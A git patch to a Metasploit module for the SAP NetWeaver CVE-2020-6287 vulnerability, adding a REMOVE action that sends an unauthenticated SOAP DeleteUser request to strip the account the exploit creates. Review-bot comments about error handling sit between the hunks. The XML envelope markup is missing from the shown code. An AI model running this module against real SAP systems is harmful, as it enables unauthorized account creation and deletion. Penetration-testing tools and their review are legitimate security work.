From ff4db5daeac984845ebccd3ed34db41f8a37e7aa Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Thu, 23 Jul 2020 17:16:05 -0400 Subject: [PATCH] Add the REMOVE action to the exploit for CVE-2020-6287 --- .../admin/sap/cve_2020_6287_ws_add_user.rb | 46 +++++++++++++++++++ 1 file changed, 46 insertions(+) diff --git a/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb b/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb index d3986fa7ed..55b551b726 100644 --- a/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb +++ b/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb @@ -31,6 +31,11 @@ class MetasploitModule < Msf::Auxiliary 'Notes' => { 'AKA' => [ 'RECON' ] }, + 'Actions' => [ + [ 'ADD', { 'Description' => 'Add the specified user' } ], + [ 'REMOVE', { 'Description' => 'Remove the specified user' } ] + ], + 'DefaultAction' => 'ADD', 'DisclosureDate' => '2020-07-14' ) ) @@ -66,6 +71,15 @@ class MetasploitModule < Msf::Auxiliary end def run + case action.name + when 'ADD' + action_add + when 'REMOVE' + action_remove + end + end + + def action_add job = nil print_status('Starting the PCK Upgrade job...') job = invoke_pckupgrade 
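Review bot: The `case action.name` in `run` (hunk `@@ -66,6 +71,15 @@`) has no `else`, so an action later added to 'Actions' without a matching `when` would make `run` return without doing or reporting anything. Adding an `else` branch with `fail_with(Failure::BadConfig, "Unsupported action: #{action.name}")` would surface that mistake to the operator instead of letting it look like a completed run. `action_add` continues outside the hunk, so this note covers `run` only.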
@@ -118,6 +132,38 @@ class MetasploitModule < Msf::Auxiliary end end + def action_remove + message = { name: 'DeleteUser' } + message[:data] = Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0) + + #{datastore['USERNAME'].encode(xml: :text)} + + ENVELOPE + + envelope = Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0) + + + + + + sap.com/tc~lm~config~content + content/Netweaver/ASJava/NWA/SPC/SPC_DeleteUser.cproc + + + #{Rex::Text.encode_base64(message[:data])} + #{message[:name]} + + + + + ENVELOPE + + res = send_request_soap(envelope) + fail_with(Failure::UnexpectedReply, 'Failed to delete the user') unless res&.code == 200 + + print_good('Successfully deleted the user account') + end + def report_error_details(job) print_error('Received a general error notification') error_event = job.get_event
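Review bot: In `action_remove`, `res&.code == 200` is the only evidence checked before `print_good('Successfully deleted the user account')`, and an HTTP 200 does not by itself show that the DeleteUser process completed; whether `send_request_soap` inspects the response body is not visible in this hunk. A false success matters here because this action is the cleanup path, so an operator who trusts it may leave the account created during an authorized assessment on the target system. I would at least separate the no-response case and report the status, with `fail_with(Failure::Unreachable, 'No response to the DeleteUser request') if res.nil?` followed by `fail_with(Failure::UnexpectedReply, "Failed to delete the user (HTTP #{res.code})") unless res.code == 200`, and word the success message as "request accepted" unless the body is also checked. A comment above the method such as `# Cleanup action: asks the server to delete the account named by USERNAME; confirm removal on the target afterwards.` would document the intent.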